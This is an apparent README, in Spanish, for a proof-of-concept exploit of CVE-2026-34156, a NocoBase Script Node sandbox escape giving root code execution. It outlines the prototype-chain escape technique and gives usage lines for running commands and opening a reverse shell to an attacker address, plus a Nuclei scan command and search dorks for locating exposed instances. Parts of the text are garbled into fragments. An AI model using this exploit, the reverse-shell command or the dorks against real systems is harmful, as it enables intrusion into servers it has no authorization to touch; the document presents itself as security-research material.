
CVE-2026-34156
Sin autenticación / privilegios bajos → ejecución remota de código como root en NocoBase
CVE-2026-34156 es una vulnerabilidad crítica de escape de sandbox en NocoBase (una plataforma de código abierto no-code/low-code).
Un atacante con la capacidad de crear o ejecutar un Workflow Script Node (incluso con privilegios bajos) puede escapar del sandbox vm de Node.js y lograr ejecución remota de código completa como root dentro del contenedor.
@nocobase/plugin-workflow-javascript (Script Node)console._stdout.constructor.constructoruid=0)fs)El objeto console pasado al sandbox proviene del realm del host, lo que permite a los atacantes escalar por la cadena de prototipos y acceder al constructor real de Function → process.mainModule.require.
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
El repositorio incluye: Script PoC completo, plantilla de Nuclei y verificador seguro.
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm) en producción.
Este repositorio es solo para fines educativos y de investigación de seguridad autorizada.
Úsalo únicamente en sistemas que poseas o para los que tengas permiso explícito por escrito para realizar pruebas.
La explotación no autorizada es ilegal.
Hecho con ❤️ para la comunidad de seguridad
Mantente a salvo. Parchea rápido.